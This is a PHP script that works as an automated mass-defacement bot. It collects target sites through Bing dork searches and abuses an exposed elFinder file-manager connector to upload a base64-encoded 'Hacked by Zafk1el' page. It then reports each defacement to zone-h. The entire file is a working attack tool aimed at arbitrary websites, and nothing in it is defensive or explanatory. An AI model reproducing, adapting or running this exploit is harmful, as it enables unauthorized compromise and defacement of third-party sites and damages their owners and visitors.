Elfinder Nazuka

1. <?php
2. @ini_set('output_buffering',0);
3. @ini_set('display_errors', 0);
4.  print "[ ========================================== ]\n";
5.         print "Bot Auto Tusbol Hosting Nazuka / IDhostinger\n";
6.         print "Coded by: zafk1el ( yuzuriha inori )\n";
7.         print "Greetz: IndoXploit - Mr.MaGnoM - LinuxSec\n";
8.         print "[ ========================================== ]\n\n";
9. $zh = "zafk1el"; // zone-h nick
10. /*---------------------------*/
11. function getsource($url,$post=null) {
12.         $ch = curl_init($url);
13.         if($post != null) {
14.             curl_setopt($ch, CURLOPT_POST, true);
15.             curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
16.         }
17.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
18.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
19.             curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
20.             curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
21.             curl_setopt($ch, CURLOPT_COOKIESESSION, true);
22.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
23.             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
24.             curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
25.         return curl_exec($ch);
26.             curl_close($ch);
27.     }
28. function ngirim($url, $isi){
29. $ch = curl_init ("$url");
30. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
31. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
32. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
33. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
34. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
35. curl_setopt ($ch, CURLOPT_POST, 1);
36. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
37. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
38. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
39. $data3 = curl_exec ($ch);
40. return $data3;
41. }
42. echo "\nDork Bing: ";$dork=trim(fgets(STDIN,1024));
43. $do=urlencode($dork);
44.         //$ip="200.58.111.34";
45.         $npage = 1;
46.         $npages = 30000;
47.         $allLinks = array();
48.         $lll = array();
49.         while($npage <= $npages) {
50.             $x = getsource("http://www.bing.com/search?q=".$do."&first=" . $npage."&FORM=PERE4");
51.             if ($x) {
52.                 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
53.                 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
54.                 $npage = $npage + 10;
55.                 if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
56.             } else break;
57.         }
58.         $URLs = array();
59.         foreach($allLinks as $url){
60.             $exp = explode("/", $url);
61.             $URLs[] = $exp[2];
62.         }
63.         $array = array_filter($URLs);
64.         $array = array_unique($array);
65.         $sss=count(array_unique($array));
66.                 echo"\nReady to fuck ". $sss." site";
67.  
68.         foreach ($array as $domain) {
69.         $_SESSION[$domain] = "1";  
70.         // set var all site + path to x
71.         $domain1 = "http://$domain"; // URL TARGET
72.         $domain_exploit = $domain1."/_file-manager/php/connector.php"; // URL to Exploit
73. $target = $domain_exploit;
74. $kaori = "zaf.php";
75. $pwnz= "$domain1/$kaori";
76. $isi_kaori = "DQoNCg0KDQoNCjxodG1sPjxoZWFkPiANCjx0aXRsZT5IYWNrZWQgYnkgWmFmazFlbDwvdGl0bGU+IA0KPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCwgZm9sbG93Ij4gDQo8bGluayByZWw9IlNIT1JUQ1VUIElDT04iICAgaHJlZj0iaHR0cDovL2kuaW1ndXIuY29tL1FZVUZtNXUucG5nIi8+IA0KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkhhY2tlZCBieSBaZiIgLz4gIA0KPG1ldGEgY29udGVudD0nemFma2llbCwga3VydW1pLCBsaW51eHNlYycgbmFtZT0na2V5d29yZHMnLz4NCjxtZXRhIG5hbWU9Imdvb2dsZWJvdCIgY29udGVudD0iaW5kZXgsZm9sbG93IiAvPiANCiA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9ImFsbCIgLz4gDQogIDxtZXRhIG5hbWU9InJvYm90cyBzY2hlZHVsZSIgY29udGVudD0iYXV0byIgLz4gDQogIDxtZXRhIG5hbWU9ImRpc3RyaWJ1dGlvbiIgY29udGVudD0iZ2xvYmFsIiAvPiANCiAgPGJhc2UgdGFyZ2V0PSdfYmxhbmsnLz4gDQo8L2hlYWQ+DQo8Ym9keSBiZ2NvbG9yPSJibGFjayIgPiANCjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPg0KPHRkIGFsaWduPWNlbnRlcj4NCjxjZW50ZXI+DQo8Zm9udCBzaXplPSI1IiBjb2xvcj0iI2ZmZmZmZiIgZmFjZT0iQ2FsaWJyaSI+PGI+emFmazFlbCBwd25lZCB5b3UgLSBsaW51eHNlYy5vcmc8L2I+PC9mb250Pjxicj4NCjxhdWRpbyBhdXRvcGxheT4NCiAgICAgIDxzb3VyY2Ugc3JjPScvL2dpdC5saW51eHNlYy5vcmcvYmxvZy9tdXNpYy9Qb3J0ZXJfUm9iaW5zb25fX1NoZWx0ZXJfKFJpbl9EaWFsb2dfVmVyc2lvbikubXAzJz4NCjwvYXVkaW8+DQoNCjwvdGQ+IA0KPC9ib2R5PjwvaHRtbD4NCg0K";
77. $decode_isi = base64_decode($isi_kaori);
78. $encode = base64_encode($kaori);
79.  
80. $fp = fopen($kaori,"w");
81. fputs($fp, $decode_isi);
82. echo "\n# $domain1\n# Try exploit...\n";
83. $url_mkfile = "$target?cmd=mkfile&name=$kaori&target=l1_Lw";
84. $b = file_get_contents("$url_mkfile");
85.  
86.  $post1 = array(
87.                     "cmd" => "put",
88.                     "target" => "l1_$encode",
89.                     "content" => "$decode_isi",
90.                    
91.                     );
92.  
93. $output_mkfile = ngirim("$target", $post1);
94. if(preg_match("/$kaori/", $output_mkfile)){
95.     echo "Exploit success => $kaori\nUrl : $pwnz\n";
96. echo "[+] zone-h: ";
97.                         $ch3 = curl_init ("http://www.zone-h.com/notify/single");
98.                         curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
99.                         curl_setopt ($ch3, CURLOPT_POST, 1);
100.                         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$pwnz&hackmode=1&reason=1");
101.                        
102.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
103.                 echo  " OK - notified by $zh \n";}
104.     else{
105.                 echo " Error \n";
106.             }
107.     }
108. else{
109.     echo "Exploit failed\n\n";
110.             }
111.         }
112. ?>